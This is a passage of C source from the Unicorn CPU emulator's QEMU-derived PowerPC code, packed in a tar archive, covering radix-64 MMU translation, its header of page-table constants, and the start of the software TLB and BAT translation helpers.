eaddr, uint64_t *lpid, uint64_t *pid) { if (msr_hv) { /* MSR[HV] -> Hypervisor/bare metal */ switch (eaddr & R_EADDR_QUADRANT) { case R_EADDR_QUADRANT0: *lpid = 0; *pid = env->spr[SPR_BOOKS_PID]; break; case R_EADDR_QUADRANT1: *lpid = env->spr[SPR_LPIDR]; *pid = env->spr[SPR_BOOKS_PID]; break; case R_EADDR_QUADRANT2: *lpid = env->spr[SPR_LPIDR]; *pid = 0; break; case R_EADDR_QUADRANT3: *lpid = 0; *pid = 0; break; } } else { /* !MSR[HV] -> Guest */ switch (eaddr & R_EADDR_QUADRANT) { case R_EADDR_QUADRANT0: /* Guest application */ *lpid = env->spr[SPR_LPIDR]; *pid = env->spr[SPR_BOOKS_PID]; break; case R_EADDR_QUADRANT1: /* Illegal */ case R_EADDR_QUADRANT2: return false; case R_EADDR_QUADRANT3: /* Guest OS */ *lpid = env->spr[SPR_LPIDR]; *pid = 0; /* pid set to 0 -> addresses guest operating system */ break; } } return true; } static void ppc_radix64_raise_segi(PowerPCCPU *cpu, int rwx, vaddr eaddr) { CPUState *cs = CPU(cpu); CPUPPCState *env = &cpu->env; if (rwx == 2) { /* Instruction Segment Interrupt */ cs->exception_index = POWERPC_EXCP_ISEG; } else { /* Data Segment Interrupt */ cs->exception_index = POWERPC_EXCP_DSEG; env->spr[SPR_DAR] = eaddr; } env->error_code = 0; } static void ppc_radix64_raise_si(PowerPCCPU *cpu, int rwx, vaddr eaddr, uint32_t cause) { CPUState *cs = CPU(cpu); CPUPPCState *env = &cpu->env; if (rwx == 2) { /* Instruction Storage Interrupt */ cs->exception_index = POWERPC_EXCP_ISI; env->error_code = cause; } else { /* Data Storage Interrupt */ cs->exception_index = POWERPC_EXCP_DSI; if (rwx == 1) { /* Write -> Store */ cause |= DSISR_ISSTORE; } env->spr[SPR_DSISR] = cause; env->spr[SPR_DAR] = eaddr; env->error_code = 0; } } static bool ppc_radix64_check_prot(PowerPCCPU *cpu, int rwx, uint64_t pte, int *fault_cause, int *prot) { CPUPPCState *env = &cpu->env; const int need_prot[] = { PAGE_READ, PAGE_WRITE, PAGE_EXEC }; /* Check Page Attributes (pte58:59) */ if (((pte & R_PTE_ATT) == R_PTE_ATT_NI_IO) && (rwx == 2)) { /* * Radix PTE entries with the non-idempotent I/O attribute are treated * as guarded storage */ *fault_cause |= SRR1_NOEXEC_GUARD; return true; } /* Determine permissions allowed by Encoded Access Authority */ if ((pte & R_PTE_EAA_PRIV) && msr_pr) { /* Insufficient Privilege */ *prot = 0; } else if (msr_pr || (pte & R_PTE_EAA_PRIV)) { *prot = ppc_radix64_get_prot_eaa(pte); } else { /* !msr_pr && !(pte & R_PTE_EAA_PRIV) */ *prot = ppc_radix64_get_prot_eaa(pte); *prot &= ppc_radix64_get_prot_amr(cpu); /* Least combined permissions */ } /* Check if requested access type is allowed */ if (need_prot[rwx] & ~(*prot)) { /* Page Protected for that Access */ *fault_cause |= DSISR_PROTFAULT; return true; } return false; } static void ppc_radix64_set_rc(PowerPCCPU *cpu, int rwx, uint64_t pte, hwaddr pte_addr, int *prot) { CPUState *cs = CPU(cpu); uint64_t npte; npte = pte | R_PTE_R; /* Always set reference bit */ if (rwx == 1) { /* Store/Write */ npte |= R_PTE_C; /* Set change bit */ } else { /* * Treat the page as read-only for now, so that a later write * will pass through this function again to set the C bit. */ *prot &= ~PAGE_WRITE; } if (pte ^ npte) { /* If pte has changed then write it back */ #ifdef UNICORN_ARCH_POSTFIX glue(stq_phys, UNICORN_ARCH_POSTFIX)(cs->uc, cs->as, pte_addr, npte); #else stq_phys(cs->uc, cs->as, pte_addr, npte); #endif } } static uint64_t ppc_radix64_walk_tree(PowerPCCPU *cpu, vaddr eaddr, uint64_t base_addr, uint64_t nls, hwaddr *raddr, int *psize, int *fault_cause, hwaddr *pte_addr) { CPUState *cs = CPU(cpu); uint64_t index, pde; if (nls < 5) { /* Directory maps less than 2**5 entries */ *fault_cause |= DSISR_R_BADCONFIG; return 0; } /* Read page <directory/table> entry from guest address space */ index = eaddr >> (*psize - nls); /* Shift */ index &= ((1UL << nls) - 1); /* Mask */ #ifdef UNICORN_ARCH_POSTFIX pde = glue(ldq_phys, UNICORN_ARCH_POSTFIX)(cs->uc, cs->as, base_addr + (index * sizeof(pde))); #else pde = ldq_phys(cs->uc, cs->as, base_addr + (index * sizeof(pde))); #endif if (!(pde & R_PTE_VALID)) { /* Invalid Entry */ *fault_cause |= DSISR_NOPTE; return 0; } *psize -= nls; /* Check if Leaf Entry -> Page Table Entry -> Stop the Search */ if (pde & R_PTE_LEAF) { uint64_t rpn = pde & R_PTE_RPN; uint64_t mask = (1UL << *psize) - 1; /* Or high bits of rpn and low bits to ea to form whole real addr */ *raddr = (rpn & ~mask) | (eaddr & mask); *pte_addr = base_addr + (index * sizeof(pde)); return pde; } /* Next Level of Radix Tree */ return ppc_radix64_walk_tree(cpu, eaddr, pde & R_PDE_NLB, pde & R_PDE_NLS, raddr, psize, fault_cause, pte_addr); } static bool validate_pate(PowerPCCPU *cpu, uint64_t lpid, ppc_v3_pate_t *pate) { CPUPPCState *env = &cpu->env; if (!(pate->dw0 & PATE0_HR)) { return false; } if (lpid == 0 && !msr_hv) { return false; } /* More checks ... */ return true; } int ppc_radix64_handle_mmu_fault(PowerPCCPU *cpu, vaddr eaddr, int rwx, int mmu_idx) { CPUState *cs = CPU(cpu); CPUPPCState *env = &cpu->env; #if 0 PPCVirtualHypervisorClass *vhc; #endif hwaddr raddr, pte_addr; uint64_t lpid = 0, pid = 0, offset, size, prtbe0, pte; int page_size, prot, fault_cause = 0; ppc_v3_pate_t pate; assert((rwx == 0) || (rwx == 1) || (rwx == 2)); /* HV or virtual hypervisor Real Mode Access */ if ((msr_hv) && (((rwx == 2) && (msr_ir == 0)) || ((rwx != 2) && (msr_dr == 0)))) { /* In real mode top 4 effective addr bits (mostly) ignored */ raddr = eaddr & 0x0FFFFFFFFFFFFFFFULL; /* In HV mode, add HRMOR if top EA bit is clear */ if (msr_hv || !env->has_hv_mode) { if (!(eaddr >> 63)) { raddr |= env->spr[SPR_HRMOR]; } } tlb_set_page(cs, eaddr & TARGET_PAGE_MASK, raddr & TARGET_PAGE_MASK, PAGE_READ | PAGE_WRITE | PAGE_EXEC, mmu_idx, TARGET_PAGE_SIZE); return 0; } /* * Check UPRT (we avoid the check in real mode to deal with * transitional states during kexec. */ #if 0 if (!ppc64_use_proc_tbl(cpu)) { qemu_log_mask(LOG_GUEST_ERROR, "LPCR:UPRT not set in radix mode ! LPCR=" TARGET_FMT_lx "\n", env->spr[SPR_LPCR]); } #endif /* Virtual Mode Access - get the fully qualified address */ if (!ppc_radix64_get_fully_qualified_addr(env, eaddr, &lpid, &pid)) { ppc_radix64_raise_segi(cpu, rwx, eaddr); return 1; } /* Get Process Table */ #if 0 if (cpu->vhyp) { vhc = PPC_VIRTUAL_HYPERVISOR_GET_CLASS(cpu->vhyp); vhc->get_pate(cpu->vhyp, &pate); } else { #endif if (!ppc64_v3_get_pate(cpu, lpid, &pate)) { ppc_radix64_raise_si(cpu, rwx, eaddr, DSISR_NOPTE); return 1; } if (!validate_pate(cpu, lpid, &pate)) { ppc_radix64_raise_si(cpu, rwx, eaddr, DSISR_R_BADCONFIG); } /* We don't support guest mode yet */ if (lpid != 0) { fprintf(stderr, "PowerNV guest support Unimplemented"); exit(1); } #if 0 } #endif /* Index Process Table by PID to Find Corresponding Process Table Entry */ offset = pid * sizeof(struct prtb_entry); size = 1ULL << ((pate.dw1 & PATE1_R_PRTS) + 12); if (offset >= size) { /* offset exceeds size of the process table */ ppc_radix64_raise_si(cpu, rwx, eaddr, DSISR_NOPTE); return 1; } #ifdef UNICORN_ARCH_POSTFIX prtbe0 = glue(ldq_phys, UNICORN_ARCH_POSTFIX)(cs->uc, cs->as, (pate.dw1 & PATE1_R_PRTB) + offset); #else prtbe0 = ldq_phys(cs->uc, cs->as, (pate.dw1 & PATE1_R_PRTB) + offset); #endif /* Walk Radix Tree from Process Table Entry to Convert EA to RA */ page_size = PRTBE_R_GET_RTS(prtbe0); pte = ppc_radix64_walk_tree(cpu, eaddr & R_EADDR_MASK, prtbe0 & PRTBE_R_RPDB, prtbe0 & PRTBE_R_RPDS, &raddr, &page_size, &fault_cause, &pte_addr); if (!pte || ppc_radix64_check_prot(cpu, rwx, pte, &fault_cause, &prot)) { /* Couldn't get pte or access denied due to protection */ ppc_radix64_raise_si(cpu, rwx, eaddr, fault_cause); return 1; } /* Update Reference and Change Bits */ ppc_radix64_set_rc(cpu, rwx, pte, pte_addr, &prot); tlb_set_page(cs, eaddr & TARGET_PAGE_MASK, raddr & TARGET_PAGE_MASK, prot, mmu_idx, 1ULL << page_size); return 0; } hwaddr ppc_radix64_get_phys_page_debug(PowerPCCPU *cpu, target_ulong eaddr) { CPUState *cs = CPU(cpu); CPUPPCState *env = &cpu->env; #if 0 PPCVirtualHypervisorClass *vhc; #endif hwaddr raddr, pte_addr; uint64_t lpid = 0, pid = 0, offset, size, prtbe0, pte; int page_size, fault_cause = 0; ppc_v3_pate_t pate; /* Handle Real Mode */ if (msr_dr == 0) { /* In real mode top 4 effective addr bits (mostly) ignored */ return eaddr & 0x0FFFFFFFFFFFFFFFULL; } /* Virtual Mode Access - get the fully qualified address */ if (!ppc_radix64_get_fully_qualified_addr(env, eaddr, &lpid, &pid)) { return -1; } /* Get Process Table */ #if 0 if (cpu->vhyp) { vhc = PPC_VIRTUAL_HYPERVISOR_GET_CLASS(cpu->vhyp); vhc->get_pate(cpu->vhyp, &pate); } else { #endif if (!ppc64_v3_get_pate(cpu, lpid, &pate)) { return -1; } if (!validate_pate(cpu, lpid, &pate)) { return -1; } /* We don't support guest mode yet */ if (lpid != 0) { fprintf(stderr, "PowerNV guest support Unimplemented"); exit(1); } #if 0 } #endif /* Index Process Table by PID to Find Corresponding Process Table Entry */ offset = pid * sizeof(struct prtb_entry); size = 1ULL << ((pate.dw1 & PATE1_R_PRTS) + 12); if (offset >= size) { /* offset exceeds size of the process table */ return -1; } #ifdef UNICORN_ARCH_POSTFIX prtbe0 = glue(ldq_phys, UNICORN_ARCH_POSTFIX)(cs->uc, cs->as, (pate.dw1 & PATE1_R_PRTB) + offset); #else prtbe0 = ldq_phys(cs->uc, cs->as, (pate.dw1 & PATE1_R_PRTB) + offset); #endif /* Walk Radix Tree from Process Table Entry to Convert EA to RA */ page_size = PRTBE_R_GET_RTS(prtbe0); pte = ppc_radix64_walk_tree(cpu, eaddr & R_EADDR_MASK, prtbe0 & PRTBE_R_RPDB, prtbe0 & PRTBE_R_RPDS, &raddr, &page_size, &fault_cause, &pte_addr); if (!pte) { return -1; } return raddr & TARGET_PAGE_MASK; } ������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/target/ppc/mmu-radix64.h���������������������������������������������������������0000664�0000000�0000000�00000005170�14675241067�0020454�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#ifndef MMU_RADIX64_H #define MMU_RADIX64_H /* Radix Quadrants */ #define R_EADDR_MASK 0x3FFFFFFFFFFFFFFF #define R_EADDR_QUADRANT 0xC000000000000000 #define R_EADDR_QUADRANT0 0x0000000000000000 #define R_EADDR_QUADRANT1 0x4000000000000000 #define R_EADDR_QUADRANT2 0x8000000000000000 #define R_EADDR_QUADRANT3 0xC000000000000000 /* Radix Partition Table Entry Fields */ #define PATE1_R_PRTB 0x0FFFFFFFFFFFF000 #define PATE1_R_PRTS 0x000000000000001F /* Radix Process Table Entry Fields */ #define PRTBE_R_GET_RTS(rts) \ ((((rts >> 58) & 0x18) | ((rts >> 5) & 0x7)) + 31) #define PRTBE_R_RPDB 0x0FFFFFFFFFFFFF00 #define PRTBE_R_RPDS 0x000000000000001F /* Radix Page Directory/Table Entry Fields */ #define R_PTE_VALID 0x8000000000000000 #define R_PTE_LEAF 0x4000000000000000 #define R_PTE_SW0 0x2000000000000000 #define R_PTE_RPN 0x01FFFFFFFFFFF000 #define R_PTE_SW1 0x0000000000000E00 #define R_GET_SW(sw) (((sw >> 58) & 0x8) | ((sw >> 9) & 0x7)) #define R_PTE_R 0x0000000000000100 #define R_PTE_C 0x0000000000000080 #define R_PTE_ATT 0x0000000000000030 #define R_PTE_ATT_NORMAL 0x0000000000000000 #define R_PTE_ATT_SAO 0x0000000000000010 #define R_PTE_ATT_NI_IO 0x0000000000000020 #define R_PTE_ATT_TOLERANT_IO 0x0000000000000030 #define R_PTE_EAA_PRIV 0x0000000000000008 #define R_PTE_EAA_R 0x0000000000000004 #define R_PTE_EAA_RW 0x0000000000000002 #define R_PTE_EAA_X 0x0000000000000001 #define R_PDE_NLB PRTBE_R_RPDB #define R_PDE_NLS PRTBE_R_RPDS #ifdef TARGET_PPC64 int ppc_radix64_handle_mmu_fault(PowerPCCPU *cpu, vaddr eaddr, int rwx, int mmu_idx); hwaddr ppc_radix64_get_phys_page_debug(PowerPCCPU *cpu, target_ulong addr); static inline int ppc_radix64_get_prot_eaa(uint64_t pte) { return (pte & R_PTE_EAA_R ? PAGE_READ : 0) | (pte & R_PTE_EAA_RW ? PAGE_READ | PAGE_WRITE : 0) | (pte & R_PTE_EAA_X ? PAGE_EXEC : 0); } static inline int ppc_radix64_get_prot_amr(PowerPCCPU *cpu) { CPUPPCState *env = &cpu->env; int amr = env->spr[SPR_AMR] >> 62; /* We only care about key0 AMR63:62 */ int iamr = env->spr[SPR_IAMR] >> 62; /* We only care about key0 IAMR63:62 */ return (amr & 0x2 ? 0 : PAGE_WRITE) | /* Access denied if bit is set */ (amr & 0x1 ? 0 : PAGE_READ) | (iamr & 0x1 ? 0 : PAGE_EXEC); } #endif /* TARGET_PPC64 */ #endif /* MMU_RADIX64_H */ ��������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/target/ppc/mmu_helper.c����������������������������������������������������������0000664�0000000�0000000�00000272024�14675241067�0020533�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * PowerPC MMU, TLB, SLB and BAT emulation helpers for QEMU. * * Copyright (c) 2003-2007 Jocelyn Mayer * * This library is free software; you can redistribute it and/or * modify it under the terms of the GNU Lesser General Public * License as published by the Free Software Foundation; either * version 2 of the License, or (at your option) any later version. * * This library is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * Lesser General Public License for more details. * * You should have received a copy of the GNU Lesser General Public * License along with this library; if not, see <http://www.gnu.org/licenses/>. */ #include "qemu/osdep.h" #include "qemu/units.h" #include "cpu.h" #include "exec/helper-proto.h" #include "mmu-hash64.h" #include "mmu-hash32.h" #include "exec/exec-all.h" #include "exec/cpu_ldst.h" #include "helper_regs.h" #include "mmu-book3s-v3.h" #include "mmu-radix64.h" /* #define DEBUG_MMU */ /* #define DEBUG_BATS */ /* #define DEBUG_SOFTWARE_TLB */ /* #define DUMP_PAGE_TABLES */ /* #define FLUSH_ALL_TLBS */ #ifdef DEBUG_MMU # define LOG_MMU_STATE(cpu) log_cpu_state_mask(CPU_LOG_MMU, (cpu), 0) #else # define LOG_MMU_STATE(cpu) do { } while (0) #endif #ifdef DEBUG_SOFTWARE_TLB # define LOG_SWTLB(...) qemu_log_mask(CPU_LOG_MMU, __VA_ARGS__) #else # define LOG_SWTLB(...) do { } while (0) #endif #ifdef DEBUG_BATS # define LOG_BATS(...) qemu_log_mask(CPU_LOG_MMU, __VA_ARGS__) #else # define LOG_BATS(...) do { } while (0) #endif /*****************************************************************************/ /* PowerPC MMU emulation */ /* Context used internally during MMU translations */ typedef struct mmu_ctx_t mmu_ctx_t; struct mmu_ctx_t { hwaddr raddr; /* Real address */ hwaddr eaddr; /* Effective address */ int prot; /* Protection bits */ hwaddr hash[2]; /* Pagetable hash values */ target_ulong ptem; /* Virtual segment ID | API */ int key; /* Access key */ int nx; /* Non-execute area */ }; /* Common routines used by software and hardware TLBs emulation */ static inline int pte_is_valid(target_ulong pte0) { return pte0 & 0x80000000 ? 1 : 0; } static inline void pte_invalidate(target_ulong *pte0) { *pte0 &= ~0x80000000; } #define PTE_PTEM_MASK 0x7FFFFFBF #define PTE_CHECK_MASK (TARGET_PAGE_MASK | 0x7B) static int pp_check(int key, int pp, int nx) { int access; /* Compute access rights */ access = 0; if (key == 0) { switch (pp) { case 0x0: case 0x1: case 0x2: access |= PAGE_WRITE; /* fall through */ case 0x3: access |= PAGE_READ; break; } } else { switch (pp) { case 0x0: access = 0; break; case 0x1: case 0x3: access = PAGE_READ; break; case 0x2: access = PAGE_READ | PAGE_WRITE; break; } } if (nx == 0) { access |= PAGE_EXEC; } return access; } static int check_prot(int prot, int rw, int access_type) { int ret; if (access_type == ACCESS_CODE) { if (prot & PAGE_EXEC) { ret = 0; } else { ret = -2; } } else if (rw) { if (prot & PAGE_WRITE) { ret = 0; } else { ret = -2; } } else { if (prot & PAGE_READ) { ret = 0; } else { ret = -2; } } return ret; } static inline int ppc6xx_tlb_pte_check(mmu_ctx_t *ctx, target_ulong pte0, target_ulong pte1, int h, int rw, int type) { target_ulong ptem, mmask; int access, ret, pteh, ptev, pp; ret = -1; /* Check validity and table match */ ptev = pte_is_valid(pte0); pteh = (pte0 >> 6) & 1; if (ptev && h == pteh) { /* Check vsid & api */ ptem = pte0 & PTE_PTEM_MASK; mmask = PTE_CHECK_MASK; pp = pte1 & 0x00000003; if (ptem == ctx->ptem) { #ifdef _MSC_VER if (ctx->raddr != (hwaddr)(0ULL - 1ULL)) { #else if (ctx->raddr != (hwaddr)-1ULL) { #endif /* all matches should have equal RPN, WIMG & PP */ if ((ctx->raddr & mmask) != (pte1 & mmask)) { qemu_log_mask(CPU_LOG_MMU, "Bad RPN/WIMG/PP\n"); return -3; } } /* Compute access rights */ access = pp_check(ctx->key, pp, ctx->nx); /* Keep the matching PTE informations */ ctx->raddr = pte1; ctx->prot = access; ret = check_prot(ctx->prot, rw, type); if (ret == 0) { /* Access granted */ qemu_log_mask(CPU_LOG_MMU, "PTE access granted !\n"); } else { /* Access right violation */ qemu_log_mask(CPU_LOG_MMU, "PTE access rejected\n"); } } } return ret; } static int pte_update_flags(mmu_ctx_t *ctx, target_ulong *pte1p, int ret, int rw) { int store = 0; /* Update page flags */ if (!(*pte1p & 0x00000100)) { /* Update accessed flag */ *pte1p |= 0x00000100; store = 1; } if (!(*pte1p & 0x00000080)) { if (rw == 1 && ret == 0) { /* Update changed flag */ *pte1p |= 0x00000080; store = 1; } else { /* Force page fault for first write access */ ctx->prot &= ~PAGE_WRITE; } } return store; } /* Software driven TLB helpers */ static inline int ppc6xx_tlb_getnum(CPUPPCState *env, target_ulong eaddr, int way, int is_code) { int nr; /* Select TLB num in a way from address */ nr = (eaddr >> TARGET_PAGE_BITS) & (env->tlb_per_way - 1); /* Select TLB way */ nr += env->tlb_per_way * way; /* 6xx have separate TLBs for instructions and data */ if (is_code && env->id_tlbs == 1) { nr += env->nb_tlb; } return nr; } static inline void ppc6xx_tlb_invalidate_all(CPUPPCState *env) { ppc6xx_tlb_t *tlb; int nr, max; /* LOG_SWTLB("Invalidate all TLBs\n"); */ /* Invalidate all defined software TLB */ max = env->nb_tlb; if (env->id_tlbs == 1) { max *= 2; } for (nr = 0; nr < max; nr++) { tlb = &env->tlb.tlb6[nr]; pte_invalidate(&tlb->pte0); } tlb_flush(env_cpu(env)); } static inline void ppc6xx_tlb_invalidate_virt2(CPUPPCState *env, target_ulong eaddr, int is_code, int match_epn) { #if !defined(FLUSH_ALL_TLBS) CPUState *cs = env_cpu(env); ppc6xx_tlb_t *tlb; int way, nr; /* Invalidate ITLB + DTLB, all ways */ for (way = 0; way < env->nb_ways; way++) { nr = ppc6xx_tlb_getnum(env, eaddr, way, is_code); tlb = &env->tlb.tlb6[nr]; if (pte_is_valid(tlb->pte0) && (match_epn == 0 || eaddr == tlb->EPN)) { LOG_SWTLB("TLB invalidate %d/%d " TARGET_FMT_lx "\n", nr, env->nb_tlb, eaddr); pte_invalidate(&tlb->pte0); tlb_flush_page(cs, tlb->EPN); } } #else /* XXX: PowerPC specification say this is valid as well */ ppc6xx_tlb_invalidate_all(env); #endif } static inline void ppc6xx_tlb_invalidate_virt(CPUPPCState *env, target_ulong eaddr, int is_code) { ppc6xx_tlb_invalidate_virt2(env, eaddr, is_code, 0); } static void ppc6xx_tlb_store(CPUPPCState *env, target_ulong EPN, int way, int is_code, target_ulong pte0, target_ulong pte1) { ppc6xx_tlb_t *tlb; int nr; nr = ppc6xx_tlb_getnum(env, EPN, way, is_code); tlb = &env->tlb.tlb6[nr]; LOG_SWTLB("Set TLB %d/%d EPN " TARGET_FMT_lx " PTE0 " TARGET_FMT_lx " PTE1 " TARGET_FMT_lx "\n", nr, env->nb_tlb, EPN, pte0, pte1); /* Invalidate any pending reference in QEMU for this virtual address */ ppc6xx_tlb_invalidate_virt2(env, EPN, is_code, 1); tlb->pte0 = pte0; tlb->pte1 = pte1; tlb->EPN = EPN; /* Store last way for LRU mechanism */ env->last_way = way; } static inline int ppc6xx_tlb_check(CPUPPCState *env, mmu_ctx_t *ctx, target_ulong eaddr, int rw, int access_type) { ppc6xx_tlb_t *tlb; int nr, best, way; int ret; best = -1; ret = -1; /* No TLB found */ for (way = 0; way < env->nb_ways; way++) { nr = ppc6xx_tlb_getnum(env, eaddr, way, access_type == ACCESS_CODE ? 1 : 0); tlb = &env->tlb.tlb6[nr]; /* This test "emulates" the PTE index match for hardware TLBs */ if ((eaddr & TARGET_PAGE_MASK) != tlb->EPN) { LOG_SWTLB("TLB %d/%d %s [" TARGET_FMT_lx " " TARGET_FMT_lx "] <> " TARGET_FMT_lx "\n", nr, env->nb_tlb, pte_is_valid(tlb->pte0) ? "valid" : "inval", tlb->EPN, tlb->EPN + TARGET_PAGE_SIZE, eaddr); continue; } LOG_SWTLB("TLB %d/%d %s " TARGET_FMT_lx " <> " TARGET_FMT_lx " " TARGET_FMT_lx " %c %c\n", nr, env->nb_tlb, pte_is_valid(tlb->pte0) ? "valid" : "inval", tlb->EPN, eaddr, tlb->pte1, rw ? 'S' : 'L', access_type == ACCESS_CODE ? 'I' : 'D'); switch (ppc6xx_tlb_pte_check(ctx, tlb->pte0, tlb->pte1, 0, rw, access_type)) { case -3: /* TLB inconsistency */ return -1; case -2: /* Access violation */ ret = -2; best = nr; break; case -1: default: /* No match */ break; case 0: /* access granted */ /* * XXX: we should go on looping to check all TLBs * consistency but we can speed-up the whole thing as * the result would be undefined if TLBs are not * consistent. */ ret = 0; best = nr; goto done; } } if (best != -1) { done: LOG_SWTLB("found TLB at addr " TARGET_FMT_plx " prot=%01x ret=%d\n", ctx->raddr & TARGET_PAGE_MASK, ctx->prot, ret); /* Update page flags */ pte_update_flags(ctx, &env->tlb.tlb6[best].pte1, ret, rw); } return ret; } /* Perform BAT hit & translation */ static inline void bat_size_prot(CPUPPCState *env, target_ulong *blp, int *validp, int *protp, target_ulong *BATu, target_ulong *BATl) { target_ulong bl; int pp, valid, prot; bl = (*BATu & 0x00001FFC) << 15; valid = 0; prot = 0; if (((msr_pr == 0) && (*BATu & 0x00000002)) || ((msr_pr != 0) && (*BATu & 0x00000001))) { valid = 1; pp = *BATl & 0x00000003; if (pp != 0) { prot = PAGE_READ | PAGE_EXEC; if (pp == 0x2) { prot |= PAGE_WRITE; } } } *blp = bl; *validp = valid; *protp = prot; } static int get_bat_6xx_tlb(CPUPPCState *env, mmu_ctx_t *ctx, target_ulong virtual, int rw, int type) { target_ulong *BATlt, *BATut, *BATu, *BATl; target_ulong BEPIl, BEPIu, bl; int i, valid, prot; int ret = -1; LOG_BATS("%s: %cBAT v " TARGET_FMT_lx "\n", __func__, type == ACCESS_CODE ? 'I' : 'D', virtual); switch (type) { case ACCESS_CODE: BATlt = env->IBAT[1]; BATut = env->IBAT[0]; break; default: BATlt = env->DBAT[1]; BATut = env->DBAT[0]; break; } for (i = 0; i < env->nb_BATs; i++) { BATu = &BATut[i]; BATl = &BATlt[i]; BEPIu = *BATu & 0xF0000000; BEPIl = *BATu & 0x0FFE0000; bat_size_prot(env, &bl, &valid, &prot, BATu, BATl); LOG_BATS("%s: %cBAT%d v " TARGET_FMT_lx " BATu " TARGET_FMT_lx " BATl " TARGET_FMT_lx "\n", __func__, type == ACCESS_CODE ? 'I' : 'D', i, virtual, *BATu, *BATl); if ((virtual & 0xF0000000) == BEPIu && ((virtual & 0x0FFE0000) & ~bl) == BEPIl) { /* BAT matches */ if (valid != 0) { /* Get physical address */ ctx->raddr = (*BATl & 0xF0000000) | ((virtual & 0x0FFE0000 & bl) | (*BATl & 0x0FFE0000)) | (virtual & 0x0001F000); /* Compute access rights */ ctx->prot = prot; ret = check_prot(ctx->prot, rw, type); if (ret == 0) { LOG_BATS("BAT %d match: r " TARGET_FMT_plx " prot=%c%c\n", i, ctx->raddr, ctx->prot & PAGE_READ ? 'R' : '-', ctx->prot & PAGE_WRITE ? 'W' : '-'); } break; } } } if (ret < 0) { #if defined(DEBUG_BATS) if (qemu_log_enabled()) { LOG_BATS("no BAT match for " TARGET_FMT_lx ":\n", virtual); for (i = 0; i < 4; i++) { BATu = &BATut[i]; BATl = &BATlt[i]; BEPIu = *BATu & 0xF0000000; BEPIl = *BATu & 0x0FFE0000; bl = (*BATu & 0x00001FFC) << 15; LOG_BATS("%s: %cBAT%d v " TARGET_FMT_lx " BATu " TARGET_FMT_lx " BATl " TARGET_FMT_lx "\n\t" TARGET_FMT_lx " " TARGET_FMT_lx " " TARGET_FMT_lx "\n", __func__, type == ACCESS_CODE ? 'I' : 'D', i, virtual, *BATu, *BATl, BEPIu, BEPIl, bl); } } #endif } /* No hit */ return ret; } /* Perform segment based translation */ static inline int get_segment_6xx_tlb(CPUPPCState *env, mmu_ctx_t *ctx, target_ulong eaddr, int rw, int type) { #if 0 PowerPCCPU *cpu = env_archcpu(env); #endif hwaddr hash; target_ulong vsid; int ds, pr, target_page_bits; int ret; target_ulong sr, pgidx; pr = msr_pr; ctx->eaddr = eaddr; sr = env->sr[eaddr >> 28]; ctx->key = (((sr & 0x20000000) && (pr != 0)) || ((sr & 0x40000000) && (pr == 0))) ? 1 : 0; ds = sr & 0x80000000 ? 1 : 0; ctx->nx = sr & 0x10000000 ? 1 : 0; vsid = sr & 0x00FFFFFF; target_page_bits = TARGET_PAGE_BITS; #if 0 qemu_log_mask(CPU_LOG_MMU, "Check segment v=" TARGET_FMT_lx " %d " TARGET_FMT_lx " nip=" TARGET_FMT_lx " lr=" TARGET_FMT_lx " ir=%d dr=%d pr=%d %d t=%d\n", eaddr, (int)(eaddr >> 28), sr, env->nip, env->lr, (int)msr_ir, (int)msr_dr, pr != 0 ? 1 : 0, rw, type); #endif pgidx = (eaddr & ~SEGMENT_MASK_256M) >> target_page_bits; hash = vsid ^ pgidx; ctx->ptem = (vsid << 7) | (pgidx >> 10); #if 0 qemu_log_mask(CPU_LOG_MMU, "pte segment: key=%d ds %d nx %d vsid " TARGET_FMT_lx "\n", ctx->key, ds, ctx->nx, vsid); #endif ret = -1; if (!ds) { /* Check if instruction fetch is allowed, if needed */ if (type != ACCESS_CODE || ctx->nx == 0) { /* Page address translation */ #if 0 qemu_log_mask(CPU_LOG_MMU, "htab_base " TARGET_FMT_plx " htab_mask " TARGET_FMT_plx " hash " TARGET_FMT_plx "\n", ppc_hash32_hpt_base(cpu), ppc_hash32_hpt_mask(cpu), hash); #endif ctx->hash[0] = hash; ctx->hash[1] = ~hash; /* Initialize real address with an invalid value */ #ifdef _MSC_VER ctx->raddr = (hwaddr)(0ULL - 1ULL); #else ctx->raddr = (hwaddr)-1ULL; #endif /* Software TLB search */ ret = ppc6xx_tlb_check(env, ctx, eaddr, rw, type); #if defined(DUMP_PAGE_TABLES) if (qemu_loglevel_mask(CPU_LOG_MMU)) { CPUState *cs = env_cpu(env); hwaddr curaddr; uint32_t a0, a1, a2, a3; #if 0 qemu_log("Page table: " TARGET_FMT_plx " len " TARGET_FMT_plx "\n", ppc_hash32_hpt_base(cpu), ppc_hash32_hpt_mask(env) + 0x80); #endif for (curaddr = ppc_hash32_hpt_base(cpu); curaddr < (ppc_hash32_hpt_base(cpu) + ppc_hash32_hpt_mask(cpu) + 0x80); curaddr += 16) { a0 = ldl_phys(cs->as, curaddr); a1 = ldl_phys(cs->as, curaddr + 4); a2 = ldl_phys(cs->as, curaddr + 8); a3 = ldl_phys(cs->as, curaddr + 12); if (a0 != 0 || a1 != 0 || a2 != 0 || a3 != 0) { qemu_log(TARGET_FMT_plx ": %08x %08x %08x %08x\n", curaddr, a0, a1, a2, a3); } } } #endif } else { #if 0 qemu_log_mask(CPU_LOG_MMU, "No access allowed\n"); #endif ret = -3; } } else { target_ulong sr; #if 0 qemu_log_mask(CPU_LOG_MMU, "direct store...\n"); #endif /* Direct-store segment : absolutely *BUGGY* for now */ /* * Direct-store implies a 32-bit MMU. * Check the Segment Register's bus unit ID (BUID). */ sr = env->sr[eaddr >> 28]; if ((sr & 0x1FF00000) >> 20 == 0x07f) { /* * Memory-forced I/O controller interface access * * If T=1 and BUID=x'07F', the 601 performs a memory * access to SR[28-31] LA[4-31], bypassing all protection * mechanisms. */ ctx->raddr = ((sr & 0xF) << 28) | (eaddr & 0x0FFFFFFF); ctx->prot = PAGE_READ | PAGE_WRITE | PAGE_EXEC; return 0; } switch (type) { case 